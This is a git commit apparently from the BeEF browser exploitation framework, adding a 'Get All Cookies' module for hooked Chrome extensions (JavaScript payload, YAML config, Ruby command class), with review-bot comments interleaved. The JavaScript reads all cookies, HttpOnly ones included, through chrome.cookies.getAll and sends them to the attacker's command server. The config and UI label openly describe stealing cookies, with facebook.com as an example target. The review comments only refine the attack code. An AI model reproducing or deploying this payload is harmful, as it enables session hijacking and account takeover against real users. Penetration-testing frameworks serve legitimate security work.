Chrome extension module for stealing cookies inc. HTTPonly

mike-at-aura committed May 29, 2012
1 parent 172ec56 commit 5aa2cefc431cf8feccb2c75ae91fa3f61ac5a303
@@ -0,0 +1,29 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+ the_url = "<%== @url %>";
+ if (the_url != 'default_all') {
+ chrome.cookies.getAll({url:the_url}, function(cookies){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
+ })
+ } else {
+ chrome.cookies.getAll({}, function(cookies){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'cookies: ' + JSON.stringify(cookies));
+ })
+ }
+
+});
+
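Review bot: `the_url = "<%== @url %>";` assigns without `var`, so the name becomes an implicit global, and the two `chrome.cookies.getAll` branches below it differ only in the filter object. Declare it with `var`, build the filter once (`{}` when the value is `default_all`, `{url: the_url}` otherwise) and make a single call with one callback. This line also uses `<%==` while the `beef.net.send` lines use `<%=`; since the value lands inside a double-quoted JavaScript string, confirm that the tag chosen escapes quotes and backslashes for that context. Each `})` closing a `getAll` call is missing its semicolon.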
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_all_cookies:
+ enable: true
+ category: "Chrome Extensions"
+ name: "Get All Cookies"
+ description: "Steal cookies even HTTPonly ones (providing the hooked extension has cookies access)<br />If a URL to steal cookies from is not specified then will steal _all_ cookies (this can be a lot!)"
+ authors: ["mh"]
+ target:
+ working: ["C"]
+ not_working: ["All"]
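Review bot: the `description` says all cookies are returned "If a URL ... is not specified", but the command script only takes that path when the value is exactly `default_all`; a field left empty would be passed through as the `url` filter. Either document the `default_all` sentinel here or treat an empty value the same way in the script. The string also embeds raw `<br />` markup, so it is worth confirming that every place this description is rendered expects HTML, and "HTTPonly" should be written "HttpOnly".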
@@ -0,0 +1,31 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Get_all_cookies < BeEF::Core::Command
+
+ def self.options
+
+ return [
+ {'name' =>'url', 'ui_label'=>'Domain to steal cookies from e.g. http://facebook.com', 'value' => 'default_all'}
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Return'] = @datastore['return']
+ save content
+ end
+
+end
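Review bot: in `self.options` the `ui_label` reads "Domain to steal cookies from" while the example and the script's `{url:the_url}` filter both take a full URL with scheme, so the label should say URL. The default `'value' => 'default_all'` exposes an internal sentinel in the input field with no explanation in the label, and nothing in this class checks the `url` option before it is templated into the command script; add a validation step that accepts only `default_all` or a well-formed http/https URL.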
